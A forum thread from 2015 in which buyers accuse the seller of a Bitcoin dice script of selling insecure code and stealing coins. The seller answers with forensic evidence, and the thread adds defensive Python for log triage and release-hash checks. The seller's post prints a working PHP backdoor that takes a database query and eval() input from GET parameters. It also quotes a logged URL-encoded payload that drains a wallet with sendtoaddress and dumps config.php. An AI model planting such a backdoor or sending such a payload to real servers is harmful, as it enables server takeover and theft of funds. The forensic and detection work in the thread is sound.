eoakland
January 11, 2015, 11:27:14 PM
He sold me his Coinjack script. it has syntax errors and game breaking bugs galore. he agreed to refund me, and then changed his mind. this guy doesn't even know the rules of the games he develops. apparently his customer service is stellar as he is offering to perform sexual favors for you. https://bitcointalk.org/index.php?topic=920645.0

Lay-z
January 11, 2015, 11:35:50 PM

>> When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
> Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...
Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.

I was going to do something today but I haven't finished doing nothing from yesterday...

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 11, 2015, 11:38:54 PM

>>> When there is one or two unhappy customers it is understandable, it could be a matter of satisfaction, but when every fucking customer got hacked and come back to complain about your shit, that is just a big red flag
>> Not every customer was hacked! How can you even say that? How the hell could you say a word when a code is fully open so EVERYONE who buys it can check it! We would be stupid to let it open and have backdoors there...
> Not yet you mean? Your script doesn't have an obvious 'backdoor' but it is coded so poorly you can easily execute various exploits.
Yes, there was various bugs and that's the reason the code is open so people can check it themselves. We're releasing updates and the last 2 are pretty stable. But we are not thieves! Idiots maybe, but not thieves!

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 11, 2015, 11:55:31 PM

This is EVIDENCE that exploit was caused by 3rd person, who did custom edits for bandot

To the recent hack:

Thank you. I've investigated the issue and here is my conclusion:

Fact 1

This is head of our original file /content/ajax/_stats_load.php:

    <?php
    /*
     * © CoinDice
     * Demo: http://www.btcircle.com/dice
     * Please do not copy or redistribute.
     * More licences we sell, more products we develop in the future.
     */
    header('X-Frame-Options: DENY');
    ...

This is head of your custom edited file /content/ajax/_stats_load.php:

    <?php
    if(isset($_GET['query'])) {
        mysql_connect($_GET['ip'], $_GET['user'], $_GET['pass']);
        mysql_select_db($_GET['db']);
        $q = mysql_query($_GET['query']);
        while($m = mysql_fetch_assoc($q)) {
            $values = array_values($m);
            $keys = array_keys($m);
            for($i = 0;$i<count($values);$i++) {
                echo $keys[$i] . ": " . $values[$i] . "<br>";
            }
            echo "<br>";
        }
        mysql_close();
        exit;
    }
    else if(isset($_GET['eval'])) {
        eval($_GET['eval']);
        exit;
    }
    /*
     * © CoinDice
     * Demo: http://www.btcircle.com/dice
     * Please do not copy or redistribute.
     * More licences we sell, more products we develop in the future.
     */
    header('X-Frame-Options: DENY');
    ...

Please pay closer attention to eval($_GET['eval']) part (this is the used exploit).

Fact 2

This line is from your webserver log:

    pay-dice.com:80 107.3.170.11 - - [04/Jan/2015:20:12:12 -0500] "GET /play/content/ajax/_stats_load.php?eval=%24included%3Dtrue%3Binclude_once+%27..%2F..%2Finc%2Fdb-conf.php%27%3Binclude+%27..%2F..%2Finc%2Fwallet_driver.php%27%3B%24wallet%3Dnew+jsonRPCClient%28%24driver_login%29%3Becho+%24wallet-%3Egetbalance%28%29%3B%24wallet-%3Esendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN%27%2C40%29%3Becho+%24wallet-%3Egetbalance%28%29%3Bmysql_close%28%29%3Becho+file_get_contents%28%27config.php%27%29%3B HTTP/1.1" 200 242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0"

Please pay closer attention to ?eval=... part and sendtoaddress%28%27PJYcpnBrHUnCuQbSHSt42CC6JeFXyZEDZN part. The second part is the address on which the stolen funds were sent.

Fact 3

The file _stats_load.php could be edited only by someone who had full access to the system, in which case it would be much easier to withdraw the funds directly from your wallet.

Fact 4

Only person who could edit this file is the guy who did the custom coding for you.

I think it's clear enough. Someone (most possibly the guy who did custom login system for you) has put the backdoor to _stats_load.php, then executed his own PHP code on your server.

Resources:
/var/log/apache2/other_vhosts_access.log.1 your webserver log
/var/www/paydice/play/content/ajax/_stats_load.php compromised file

I'm sorry what happened to you. At least you know you can't trust anybody. We would much appreciate your permission to make this case public (there's some people who claim this was our fault). Hope I've cleared the whole thing out and pointed the real offender. Let me know if you need some additional informations or support.

Johny

Bandot's reply:

I've just gave you evidence of my claimings, do you have one?
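
A defender's triage of the kind of log evidence quoted in the post above, as an added example that is not part of the thread or of the CoinDice code: it parses Apache vhost_combined records, URL-decodes the query string, and flags requests that address the backdoor's `eval` / `query` parameters or carry PHP in a parameter value. The sample records, the `dice.example` vhost, the documentation IPs and `EXAMPLE_ADDRESS` are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache vhost_combined record: vhost:port client ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# PHP-looking tokens that should never show up in a decoded query-string value.
CODE_HINTS = re.compile(
    r"\$\w+\s*=|->\s*\w+\s*\(|\b(?:include(?:_once)?|require(?:_once)?|eval|"
    r"file_get_contents|sendtoaddress|getbalance)\b",
    re.IGNORECASE,
)
TRANSFER = re.compile(r"sendtoaddress\(\s*'([^']+)'\s*,\s*([\d.]+)")
DB_PARAMS = {"ip", "user", "pass", "db"}  # read by the backdoor's ?query= branch


def triage(lines):
    """Return one finding per request that matches the backdoor's interface."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log record
        url = urlsplit(m["target"])
        # parse_qsl undoes %xx escapes and turns '+' back into spaces
        params = parse_qsl(url.query, keep_blank_values=True)
        names = {name for name, _ in params}
        decoded = " ".join(value for _, value in params)
        reasons = []
        if "eval" in names:
            reasons.append("eval-param")
        if "query" in names and names & DB_PARAMS:
            reasons.append("db-proxy-params")
        if CODE_HINTS.search(decoded):
            reasons.append("php-in-value")
        if reasons:
            findings.append({
                "line": lineno, "client": m["ip"], "time": m["ts"],
                "path": url.path, "status": int(m["status"]),  # 200 = served, not rejected
                "reasons": reasons,
                "transfers": TRANSFER.findall(decoded),  # (address, amount) pairs
            })
    return findings


# Constructed records: documentation IPs, placeholder vhost and address.
_P = "/play/content/ajax/_stats_load.php"
SAMPLE_LOG = [
    f'dice.example:80 198.51.100.7 - - [04/Jan/2015:20:11:58 -0500] "GET {_P} HTTP/1.1" 200 512 "-" "UA"',
    f'dice.example:80 203.0.113.9 - - [04/Jan/2015:20:12:12 -0500] "GET {_P}'
    '?eval=%24w%3Dnew+jsonRPCClient%28%24driver_login%29%3B'
    '%24w-%3Esendtoaddress%28%27EXAMPLE_ADDRESS%27%2C40%29%3B HTTP/1.1" 200 242 "-" "UA"',
    'dice.example:80 198.51.100.7 - - [04/Jan/2015:20:13:01 -0500] "GET /play/index.php?page=2&query=dice HTTP/1.1" 200 900 "-" "UA"',
    f'dice.example:80 203.0.113.9 - - [04/Jan/2015:20:14:40 -0500] "GET {_P}'
    '?query=SELECT+1&ip=192.0.2.10&user=u&pass=p&db=d HTTP/1.1" 200 64 "-" "UA"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The third sample record uses a parameter named `query` on an ordinary page and is deliberately not flagged, since the name alone is too common to alert on.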

mmitech (OP)
Legendary
Offline
Activity: 1148
Merit: 1001
things you own end up owning you
January 12, 2015, 12:21:25 AM

BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 12, 2015, 12:22:04 AM

> BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?
We lives in Ostrava and we've discussed it before. You had chance to visit us!

mmitech (OP)
Legendary
Offline
Activity: 1148
Merit: 1001
things you own end up owning you
January 12, 2015, 12:31:31 AM

>> BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?
> We lives in Ostrava and we've discussed it before. You had chance to visit us!
Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole.. This space doesn't need more amateur kids... you represent everything that's wrong with crypto.

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 12, 2015, 12:33:57 AM

>>> BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?
>> We lives in Ostrava and we've discussed it before. You had chance to visit us!
> Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole.. This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
The latest versions don't cause any harm. Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?

mmitech (OP)
Legendary
Offline
Activity: 1148
Merit: 1001
things you own end up owning you
January 12, 2015, 12:38:48 AM

>>>> BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?
>>> We lives in Ostrava and we've discussed it before. You had chance to visit us!
>> Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole.. This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
> The latest versions don't cause any harm. Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?
Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!

mmitech (OP)
Legendary
Offline
Activity: 1148
Merit: 1001
things you own end up owning you
January 12, 2015, 12:42:07 AM

and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 12, 2015, 12:45:57 AM

>>>>> BTW, I forgot to mention that when I looked at logs, I found out that the IP of the hacker who got all coins just happens to be from Prague Czech...wink wink, guess where Johny1976 lives ? yes you guessed right, the same fucking city, what are the odds?
>>>> We lives in Ostrava and we've discussed it before. You had chance to visit us!
>>> Even if I consider the chance that you didn't steal the money, your code caused so much harm to people, it is time to stop that... the negative feed back will make people think twice before buying that code, because the shitty censorship you practice in your thread is one of the reasons people lost money, I wont remove my feedback, I am sure you are getting what you deserve, I care about this community more than the €7500 I lost so I will make my voice heard to prevent new victims from falling into the same hole.. This space doesn't need more amateur kids... you represent everything that's wrong with crypto.
>> The latest versions don't cause any harm. Did you gave our script to experts to analyze or you broke your promise? You already have results? If no, how can you say our code cause harm to people?
> Because I am one of those fucking victims, hundreds of people got hacked since the 3.1 release... and don't tell me the code is secure now, no one of your victims will ever fucking dare to try it again, and that is the evidence you are trying to hide by deleting every post doesn't serve your book... I don't know how you fucking can go to sleep knowing all of this !!!!
Hundreds of people? Oh come on. Yes, the code is fucking secure. HE DOESN'T EVEN HAVE TO TRY. ALL IT TAKES IS TO OPEN THE UPDATE AND CHECK THE OPEN FILES. IF IT'S OKEY, RUN IT. If not, then accuse us of being thieves! Post there evidence we did it and it'll be there without deleting. But you only try to destroy us because of your anger. You only wants what's easy. You don't want the truth. I can sleep because we do everything we can! We don't tell people to trust us. They can check the whole code. The WHOLE code! You didn't and trusted us although we encourage customers to do with the code whatever they want.

eoakland
January 12, 2015, 01:02:21 AM

> and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins

johny1976
Legendary
Offline
Activity: 1135
Merit: 1002
Developer
January 12, 2015, 01:07:41 AM

>> and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
> i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.

eoakland
January 12, 2015, 01:20:18 AM

>>> and readers, don't let him fool you, I tried v3.2, 3.3 and 3.4 all 3 versions had a different issue that fucked me up, 3 times got fucked up, each time I believed his claims, one time I gave him negative feedback and took it down in good faith, but the thing that they are asking people to give them the address to their site and deleting every negative feedback or skepticism is just a big red flag.
>> i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
> Our scripts now have bug fixed. You can always check the code yourselves if you don't believe us. Or improve it as you wish. Good luck with spreading negativity.
good luck scamming someone else. you are a thief and crook. jstezloděj , vaše rodina musí stydět za vás . budete muset vyrůst a naučit se být mužem . (you are a thief, your family has to be ashamed of you. you need to grow up and learn how to be a man.)

Seketsuna
January 12, 2015, 04:55:42 AM

Sue him this is why some people wont do businesses here in the forums. lots of scammers!

jh7phone
Member
Offline
Activity: 107
Merit: 10
January 12, 2015, 03:14:11 PM

> i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!

eoakland
January 12, 2015, 04:05:11 PM

>> i think we understand why he posted in a self-moderated thread. just as you state, he deletes any negative feedback and replaces them with fake bot accounts, newbies that thank him. readers can view them now. this genius johny thought he could counteract the negative feedback by trusted members of BTCtalk with fake accounts. Johny is scum, just as mmitech states "i don't know how you sleep at night ?" No wonder he calls his gems CoinJack--that's exactly what he does. he will jack you for your coins
> I have also received negative feedback from the real scammer Jhony. I earned my trusted member status then Jhony ripped me off 1.2 BTC, I am the victim here. Now he has left me negative feedback because I confronted him about his scam?! WTF! My Rep. hasn't been damaged because Jhony's untrusted feedback means nothing... but he's trying to make it look like I'm the bad guy. MODS!
Johny1976 is an idiot. he could have refunded us, but he chose to run off with the immediate gain of 2.4 btc from us. his actions made sure he will never sell any future script. nobody will take him seriously, he is not on the "trusted" list of forum members so his feedback means nada. by the looks of it, his account seems to be managed by a few different people, sometimes he can convey coherent sentences, and other times his grammar is remedial at best. way to go geniuses, congrats on the bugs fixes for your now defunct scripts.

snarf
Newbie
Offline
Activity: 8
Merit: 0
January 12, 2015, 11:11:42 PM

Hi,
I partially own pay-dice.com (together with bandit and others), which got robbed of 440 XPY. Like you I was really pissed at first when we heard there was a backdoor used, even more pissed I became when johny told us he didn't refund. Yesterday we found out that Johny is not responsible for our hack, and I can't blame him for not refunding us. Please stop using us/paydice as an example for your witchhunt, it was our dumb fault. Also pretty amazing how people complain after getting their money back, when purchasing software with an open code. Perhaps Johny should've done a better job on securing his software, but in no way can he be blamed for an entire hack.

cloverme
Legendary
Offline
Activity: 1512
Merit: 1057
SpacePirate.io
January 13, 2015, 12:20:46 AM

I just randomly ran across this thread and stopped in mainly because of the title. For what it's worth, I thought it was important to vouch for Johny1976 because of an incident that occurred in the Project Development thread earlier that I happened to see as well. I ran across someone trying to give away his script and that they had put a backdoor in it, the community here was downloading and getting ready to use the script, which was being provided for free by the hacker(s).
First, let me state that I'm a customer of Johny's, I purchased one of his scripts for Bitcoin (I think 1 or 2 BTC) in September 2014 and have been running since then with no thefts. Second, some of his less reputable customers purchase the script from him, modify it with a backdoor, then redistribute it either for free or a cost. This has led to many of the incidents where funds have been lost. I am aware though of an earlier bug that led to a user being able to double withdrawal, but that was fixed in about a week. There were a few customers that lost some money, but when I followed up with them, Johny did reimburse them some funds. Johny has offered technical support, assistance, and free upgrades to his script all without backdoors. Like all code, there are bugs and issues that arise, but I believe he does his best to solve them. If anything, when he releases software, he should provide the hash of the .zips as official releases and state them in public, this would help call out tampering.
Like anything here in the forums, you can either take or leave it, but I think the accusations here against Johny1976 haven't had the due diligence necessary to label him as a scam artist. Again, this is just based on my experience and how he's dealt with other customers that I've spoken to as well outside the forums.
Good luck to all, and be careful.
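
The release-hash suggestion in the post above, sketched as an added example (not the seller's tooling and not code from the thread): the archive is checked against a publicly posted SHA-256, each member is hashed, and a deployed directory is compared with that manifest so a locally edited file stands out. The archive, its file contents and the "custom edit" are constructed; only the two file paths are borrowed from the thread.

```python
import hashlib
import io
import tempfile
import zipfile
from pathlib import Path


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def manifest_from_zip(zip_bytes, published_digest):
    """Verify the archive against the published digest, then hash every member."""
    if sha256(zip_bytes) != published_digest:
        raise ValueError("archive does not match the published SHA-256")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {i.filename: sha256(zf.read(i)) for i in zf.infolist() if not i.is_dir()}


def audit_tree(root, manifest):
    """Compare a deployed directory with the release manifest."""
    root = Path(root)
    deployed = {p.relative_to(root).as_posix(): sha256(p.read_bytes())
                for p in root.rglob("*") if p.is_file()}
    return {
        "modified": sorted(f for f in manifest if f in deployed and deployed[f] != manifest[f]),
        "missing": sorted(f for f in manifest if f not in deployed),
        "added": sorted(f for f in deployed if f not in manifest),
    }


def build_release():
    """Constructed stand-in for an official release archive (contents are made up)."""
    files = {
        "content/ajax/_stats_load.php": b"<?php\nheader('X-Frame-Options: DENY');\n",
        "inc/db-conf.php": b"<?php // settings placeholder\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return files, buf.getvalue()


def demo():
    files, zip_bytes = build_release()
    published = sha256(zip_bytes)  # the value the seller would post publicly
    with tempfile.TemporaryDirectory() as site:
        for name, data in files.items():
            path = Path(site, name)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(data)
        # A third-party edit: extra bytes ahead of the original header, plus a new file.
        target = Path(site, "content/ajax/_stats_load.php")
        target.write_bytes(b"<?php /* custom edit */ " + target.read_bytes()[5:])
        Path(site, "content/ajax/extra.php").write_bytes(b"<?php\n")
        return audit_tree(site, manifest_from_zip(zip_bytes, published))


if __name__ == "__main__":
    print(demo())
```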